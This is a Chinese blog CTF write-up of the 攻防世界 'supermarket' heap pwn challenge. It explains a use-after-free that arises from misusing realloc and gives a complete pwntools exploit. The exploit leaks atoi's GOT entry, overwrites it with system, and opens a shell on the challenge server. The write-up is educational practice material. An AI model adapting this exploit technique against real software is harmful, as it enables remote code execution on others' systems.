<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="browsermode" content="application">
<meta name="apple-touch-fullscreen" content="yes">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-title" content="Axojhf的博客">
<meta name="apple-mobile-web-app-status-bar-style" content="default">
<meta name="msapplication-navbutton-color" content="#666666">
<meta name= "format-detection" content="telephone=no" />





  <meta name="keywords" content="Writeup, nlvi" />


<link rel="apple-touch-startup-image" media="(device-width: 375px)" href="assets/apple-launch-1125x2436.png">
<link rel="apple-touch-startup-image" media="(orientation: landscape)" href="assets/apple-touch-startup-image-2048x1496.png">

<link rel="stylesheet" href="/blog/style/style.css">

<script>
  var nlviconfig = {
    title: "Axojhf的博客",
    author: "Axojhf",
    baseUrl: "/blog/",
    theme: {
      scheme: "banderole",
      lightbox: true,
      animate: true,
      search: true,
      friends: false,
      reward: false,
      pjax: false,
      lazy: false,
      toc: true
    }
  }
</script>




    
<link rel="stylesheet" href="/blog/script/lib/lightbox/css/lightbox.min.css">





    
<link rel="stylesheet" href="/blog/syuanpi/syuanpi.min.css">
















<style>
@font-face {
  font-family: "Allura";
  src: url('/blog/font/allura/allura.ttf');
}
</style>

  <title> 攻防世界--supermarket题Writeup · Axojhf的博客 </title>
<meta name="generator" content="Hexo 4.2.1"></head>
<body>
  <div class="container">
    <header class="header" id="header">
  <div class="header-wrapper">
    <div class="logo">
  <div class="logo-inner syuanpi tvIn" style="display:none;">
    <h1><a href="/blog/">Axojhf的博客</a></h1>
    
  </div>
</div>

    <nav class="main-nav">
  
  <ul class="main-nav-list syuanpi tvIn">
  
    <li class="menu-item">
      <a href="javascript:;" id="search-btn" aria-label="Search">
        <i class="iconfont icon-search"></i>
      </a>
    </li>
  
  
  
    
  
    <li class="menu-item">
      <a href="/blog/" id="article">
        <span class="base-name">
          
            ARTICLE
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="/blog/archives" id="archives">
        <span class="base-name">
          
            ARCHIVES
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="javascript:;" id="tags">
        <span class="base-name">
          
            TAGS
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="/blog/about" id="about">
        <span class="base-name">
          
            ABOUT
          
        </span>
      </a>
    </li>
  
  
  </ul>
  
</nav>

  </div>
</header>
<div class="mobile-header" id="mobile-header">
  <div class="mobile-header-nav">
    <div class="mobile-header-item" id="mobile-left">
      <div class="header-menu-item">
        <div class="header-menu-line"></div>
      </div>
    </div>
    <h1 class="mobile-header-title">
      <a href="/">Axojhf的博客</a>
    </h1>
    <div class="mobile-header-item"></div>
  </div>
  <div class="mobile-header-body">
    <ul class="mobile-header-list">
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-0">
          <a href="/blog/" >
            
              ARTICLE
            
          </a>
        </li>
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-1">
          <a href="/blog/archives" >
            
              ARCHIVES
            
          </a>
        </li>
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-2">
          <a href="javascript:;" id="mobile-tags">
            
              TAGS
            
          </a>
        </li>
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-3">
          <a href="/blog/about" >
            
              ABOUT
            
          </a>
        </li>
      
    </ul>
  </div>
</div>



    <div class="container-inner" style="display:none;">
      <main class="main" id="main">
        <div class="main-wrapper">
          
    
  
  <article class="
  post
   is_post 
  ">
    <header class="post-header">
      <div class="post-time syuanpi fadeInRightShort back-1">
        <div class="post-time-wrapper">
          
          <time>2020-06-02</time>
          
        </div>
      </div>
      <h2 class="post-title syuanpi fadeInRightShort back-2">
        
          攻防世界--supermarket题Writeup
        
      </h2>
    </header>
    <div class="post-content syuanpi fadeInRightShort back-3">
      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>本题是一道堆利用的pwn题，说实话，博主在堆方向上还是刚刚入门，并没有很深刻的了解，本题的部分理解也可能不准确，欢迎大家斧正<br>本题核心在于对realloc函数的理解，还有如何构造出最佳的内存块供利用<br>博主在解本题的时候很大程度上参考了<a href="https://blog.csdn.net/seaaseesa/article/details/103093182" target="_blank" rel="noopener">攻防世界PWN之Supermarket题解</a></p>
<p>(博主还是菜鸟，有些知识可能理解不够透彻，有些表述可能不够严谨，欢迎大家指正，望大家多多包涵)</p>
<a id="more"></a>

<h1 id="解题过程"><a href="#解题过程" class="headerlink" title="解题过程"></a>解题过程</h1><p>程序信息：<br><img src="https://img-blog.csdnimg.cn/20200204160452961.png" alt=""><br>分析程序可知几个主要功能：<br><img src="https://img-blog.csdnimg.cn/20200204160824239.jpg" alt=""><br>并且都分布在switch语句里：<br><img src="https://img-blog.csdnimg.cn/20200204161033898.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0F4b2poZg==,size_16,color_FFFFFF,t_70" alt=""><br>通过分析程序的行为，可以画出程序储存数据的一个结构：<br><img src="https://img-blog.csdnimg.cn/20200204185329589.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0F4b2poZg==,size_16,color_FFFFFF,t_70" alt=""><br>（而且程序里有一个数组储存可以储存15个指向“name”的指针）</p>
<p>经分析可知几个重要的字符串输入语句都没有什么可溢出的地方，那么栈溢出可能行不通了<br>看了别人的WriteUp我才发现真正的溢出的地方在那个realloc函数的地方<br><img src="https://img-blog.csdnimg.cn/20200204173002806.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0F4b2poZg==,size_16,color_FFFFFF,t_70" alt=""></p>
<blockquote>
<p>realloc函数的功能：<br>先判断当前的指针是否有足够的连续空间，如果有，扩大mem_address指向的地址，并且将mem_address返回。<br>如果空间不够，先按照newsize指定的大小分配空间，将原有数据从头到尾拷贝到新分配的内存区域，而后释放原来mem_address所指内存区域（注意：原来指针是自动释放，不需要使用free），同时<strong>返回新分配的内存区域的首地址</strong>。即重新分配存储器块的地址。</p>
</blockquote>
<p>也就是说，如果一个指针需要分配的内存比当前的指针附近的连续空间大，那么我们应该要将realloc函数的返回值赋给这个指针才可以完成扩容。<br>然而上图中12行的代码并没有这么做，那么就存在UAF漏洞！</p>
<p>因此，我们只需要创建一个上述结构（下文简称结构1），再利用realloc函数对结构1的description部分内存重分配，再创建创建一个结构（下文简称结构2），使结构2分配到结构1的description部分释放的内存</p>
<p>我们第一想到的肯定是利用一个fastbin大小的内存，但是这里刚好不可以，因为用于修改description部分的函数只能读取description_size - 1大小的数据，而descrip pointer段正好在末尾，会有一个字节被置0，而且实现“add a commodity”功能的函数为这个结构申请了28字节空间，那么一个分配的malloc_chunk就刚好到32字节+4字节（后4字节可由后一个chunk的prev_size代替），这样就算我们想realloc()29个字节，也不会分配32字节的chunk了，所以不能使用fastbin！<br>为了方便，可以将description_size设为unsorted bin的大小，然后找机会泄漏出atoi的GOT表，再通过修改结构2的方法修改atoi的GOT表为system的地址（主要是方便之后输入/bin/sh得到shell）<br>脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">context(os=<span class="string">'linux'</span>,arch=<span class="string">'amd64'</span>)</span><br><span class="line">pwn = remote(<span class="string">'111.198.29.45'</span>,<span class="number">00000</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(name,price,descrip_size,description)</span>:</span></span><br><span class="line">    pwn.sendlineafter(<span class="string">'your choice&gt;&gt; '</span>,<span class="string">'1'</span>)</span><br><span class="line">    pwn.sendlineafter(<span class="string">'name'</span>,name)</span><br><span class="line">    pwn.sendlineafter(<span class="string">'price:'</span>,price)</span><br><span class="line">    pwn.sendlineafter(<span class="string">'descrip_size:'</span>,descrip_size)</span><br><span class="line">    pwn.sendlineafter(<span class="string">'description:'</span>,description)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(name)</span>:</span></span><br><span class="line">    pwn.sendlineafter(<span class="string">'your choice&gt;&gt; '</span>,<span class="string">'2'</span>)</span><br><span class="line">    pwn.sendlineafter(<span class="string">'name:'</span>,name)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change</span><span class="params">(name,new_size,new_description)</span>:</span></span><br><span class="line">    pwn.sendlineafter(<span class="string">'your choice&gt;&gt; '</span>,<span class="string">'5'</span>)</span><br><span class="line">    pwn.sendlineafter(<span class="string">'name:'</span>,name)</span><br><span class="line">    pwn.sendlineafter(<span class="string">'descrip_size:'</span>,new_size)</span><br><span class="line">    pwn.sendlineafter(<span class="string">'description:'</span>,new_description)</span><br><span class="line"></span><br><span class="line">add(<span class="string">'1'</span>,<span class="string">'8'</span>,<span class="string">'128'</span>,<span class="string">''</span>)</span><br><span class="line">add(<span class="string">'0'</span>,<span class="string">'7'</span>,<span class="string">'10'</span>,<span class="string">'OK'</span>)<span class="comment">#防止chunk被合并</span></span><br><span class="line">change(<span class="string">'1'</span>,<span class="string">'144'</span>,<span class="string">''</span>)</span><br><span class="line">add(<span class="string">'2'</span>,<span class="string">'9'</span>,<span class="string">'10'</span>,<span class="string">''</span>)</span><br><span class="line">payload = <span class="string">'2'</span>.ljust(<span class="number">16</span>,<span class="string">'\x00'</span>) + p32(<span class="number">20</span>) + p32(<span class="number">0x20</span>) + p32(<span class="number">0x804b048</span>)</span><br><span class="line">change(<span class="string">'1'</span>,<span class="string">'144'</span>,payload)</span><br><span class="line">pwn.sendlineafter(<span class="string">'your choice&gt;&gt; '</span>,<span class="string">'3'</span>)</span><br><span class="line">pwn.recvuntil(<span class="string">'price.20, des.'</span>)</span><br><span class="line">atoi_add = pwn.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>]</span><br><span class="line">system_add = u32(atoi_add) + <span class="number">0xd8f0</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">这里获得system的地址我选择先泄漏一次atoi的地址，</span></span><br><span class="line"><span class="string">再到https://libc.blukat.me/这个网站找到对应的libc库，</span></span><br><span class="line"><span class="string">获得atoi与system的相对地址0xd8f0</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">log.info(<span class="string">'system_add'</span> + str(system_add))</span><br><span class="line">change(<span class="string">'2'</span>,<span class="string">'32'</span>,p32(system_add))</span><br><span class="line">pwn.interactive()</span><br><span class="line">pwn.close()</span><br></pre></td></tr></table></figure>
      
    
    </div>
    
      <div class="post-tags syuanpi fadeInRightShort back-3">
      
        <a href="/blog/tags/Writeup/">Writeup</a>
      
      </div>
    
    
      

      
  <hr class="copy-line">
  <div class="post-copyright">
    <div class="copy-author">
      <span>作者 :</span>
      <span>Axojhf</span>
    </div>
    <div class="copy-url">
      <span>地址 :</span>
      <a href="http://xiaoaoaode.gitee.io/blog/2020/06/02/471a08d2/">http://xiaoaoaode.gitee.io/blog/2020/06/02/471a08d2/</a>
    </div>
    <div class="copy-origin">
      <span>来源 :</span>
      <a href="http://xiaoaoaode.gitee.io/blog">http://xiaoaoaode.gitee.io/blog</a>
    </div>
    <div class="copy-license">
      
      著作权归作者所有，转载请联系作者获得授权。
    </div>
  </div>

    
  </article>
  
    
  <nav class="article-page">
    
      <a href="/blog/2020/06/02/a54507f8/" id="art-left" class="art-left">
        <span class="next-title">
          <i class="iconfont icon-left"></i>攻防世界——dice_game题Writeup
        </span>
      </a>
    
    
      <a href="/blog/2020/06/01/14185/" id="art-right" class="art-right">
        <span class="prev-title">
          我写出来的招新题的Writeup<i class="iconfont icon-right"></i>
        </span>
      </a>
    
  </nav>


    
  <i id="com-switch" class="iconfont icon-down jumping-in long infinite" style="font-size:24px;display:block;text-align:center;transform:rotate(180deg);"></i>
  <div class="post-comments" id="post-comments" style="display: block;margin: auto 16px;">
    

    
    

    

  </div>



  
  
    
  
  <aside class="post-toc">
    <div class="title"><span>文章导航</span></div>
    <div class="toc-inner">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#解题过程"><span class="toc-text">解题过程</span></a></li></ol>
    </div>
  </aside>



  


        </div>
      </main>
      <footer class="footer syuanpi fadeIn" id="footer">
  <hr>
  <div class="footer-wrapper">
    <div class="left">
      <div class="contact-icon">
  
  
</div>

    </div>
    <div class="right">
      <div class="copyright">
    <div class="info">
        <span>&copy;</span>
        <span>2020 ~ 2020</span>
        <span>❤</span>
        <span>Axojhf</span>
    </div>
    <div class="theme">
        <span>
            动力来源于
            <a href="http://hexo.io/" target="_blank" rel="noopener">Hexo </a>
        </span>
        <span>
            主题
            <a href="https://github.com/ColMugX/hexo-theme-Nlvi" target="_blank" rel="noopener"> Nlvi </a>
        </span>
    </div>
    
</div>

    </div>
  </div>
</footer>
    </div>
    <div class="tagcloud" id="tagcloud">
  <div class="tagcloud-taglist">
  
    <div class="tagcloud-tag">
      <button>Writeup</button>
    </div>
  
    <div class="tagcloud-tag">
      <button>其他</button>
    </div>
  
    <div class="tagcloud-tag">
      <button>知识点记录</button>
    </div>
  
  </div>
  
    <div class="tagcloud-postlist active">
      <h2>Writeup</h2>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/27/dd14f23d/">
            <time class="tagcloud-posttime">2020 / 07 / 27</time>
            <span>BUUCTF-Pwn题-Writeup（1）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/28/cfa15dd3/">
            <time class="tagcloud-posttime">2020 / 07 / 28</time>
            <span>BUUCTF-Pwn题-Writeup（2）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/16/771d3ab6/">
            <time class="tagcloud-posttime">2020 / 08 / 16</time>
            <span>BUUCTF-Pwn题-Writeup（3）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/19/5276656a/">
            <time class="tagcloud-posttime">2020 / 08 / 19</time>
            <span>BUUCTF-Pwn题-Writeup（5）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/17/eaca020f/">
            <time class="tagcloud-posttime">2020 / 08 / 17</time>
            <span>BUUCTF-Pwn题-Writeup（4）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/09/21/f87fade1/">
            <time class="tagcloud-posttime">2020 / 09 / 21</time>
            <span>BUUCTF-Pwn题-Writeup（7）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/09/04/40c3ca84/">
            <time class="tagcloud-posttime">2020 / 09 / 04</time>
            <span>BUUCTF-Pwn题-Writeup（6）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/09/28/a01cbdb7/">
            <time class="tagcloud-posttime">2020 / 09 / 28</time>
            <span>BUUCTF-Pwn题-Writeup（8）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/31/2253bdbe/">
            <time class="tagcloud-posttime">2020 / 08 / 31</time>
            <span>DASCTF2020八月赛个人Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/26/253f1adb/">
            <time class="tagcloud-posttime">2020 / 07 / 26</time>
            <span>DASCTF七月赛个人Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/24/49582296/">
            <time class="tagcloud-posttime">2020 / 08 / 24</time>
            <span>CISCN2020初赛个人Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/01/14185/">
            <time class="tagcloud-posttime">2020 / 06 / 01</time>
            <span>我写出来的招新题的Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/17/45ae5a23/">
            <time class="tagcloud-posttime">2020 / 06 / 17</time>
            <span>攻防世界-“250”题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/09/7b438d60/">
            <time class="tagcloud-posttime">2020 / 06 / 09</time>
            <span>攻防世界-babyheap题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/17/47cfb24f/">
            <time class="tagcloud-posttime">2020 / 06 / 17</time>
            <span>攻防世界-“Recho”题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/12/e563c85c/">
            <time class="tagcloud-posttime">2020 / 07 / 12</time>
            <span>攻防世界-magic题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/10/07/9b619749/">
            <time class="tagcloud-posttime">2020 / 10 / 07</time>
            <span>攻防世界-nobug题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/02/471a08d2/">
            <time class="tagcloud-posttime">2020 / 06 / 02</time>
            <span>攻防世界--supermarket题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/10/04/77eb8480/">
            <time class="tagcloud-posttime">2020 / 10 / 04</time>
            <span>攻防世界-onemanarmy题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/02/a54507f8/">
            <time class="tagcloud-posttime">2020 / 06 / 02</time>
            <span>攻防世界——dice_game题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/10/928398a1/">
            <time class="tagcloud-posttime">2020 / 06 / 10</time>
            <span>攻防世界-"实时数据监测"题Writeup</span>
          </a>
        </div>
      
    </div>
  
    <div class="tagcloud-postlist ">
      <h2>其他</h2>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/07/38a4c9bb/">
            <time class="tagcloud-posttime">2020 / 08 / 07</time>
            <span>Pwn环境的搭建和解答一些简单Pwn题的分享</span>
          </a>
        </div>
      
    </div>
  
    <div class="tagcloud-postlist ">
      <h2>知识点记录</h2>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/10/44355a63/">
            <time class="tagcloud-posttime">2020 / 08 / 10</time>
            <span>_IO_FILE结构与fread函数知识点小结</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/01/8e1ab4ab/">
            <time class="tagcloud-posttime">2020 / 08 / 01</time>
            <span>Pwn题里有关seccomp和prctl函数的知识点小结</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/19/5cfa9d84/">
            <time class="tagcloud-posttime">2020 / 07 / 19</time>
            <span>正则表达式学习1</span>
          </a>
        </div>
      
    </div>
  
</div>

  </div>
  <div class="backtop syuanpi melt toTop" id="backtop">
    <i class="iconfont icon-up"></i>
    <span style="text-align:center;font-family:Georgia;"><span style="font-family:Georgia;" id="scrollpercent">1</span>%</span>
</div>

  <div class="search" id="search">
    <div class="input">
      <input type="text" id="search-input" placeholder="搜索一下？" autofocus>
    </div>
    <div id="search-result"></div>
  </div>



<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>



  <script></script>
  <script src="/blog/script/lib/lightbox/js/lightbox.min.js" async></script>











  
<script src="/blog/script/scheme/banderole.js"></script>




<script src="/blog/script/bootstarp.js"></script>



<script>
if (nlviconfig.theme.toc) {
  setTimeout(function() {
    if (nlviconfig.theme.scheme === 'balance') {
      $("#header").addClass("show_toc");
    } else if (nlviconfig.theme.scheme === 'banderole') {
      $(".container-inner").addClass("has_toc");
      $(".post-toc .title").addClass("show");
      $(".toc-inner").addClass("show");
    }
  }, 1000);
}
</script>



</body>
</html>
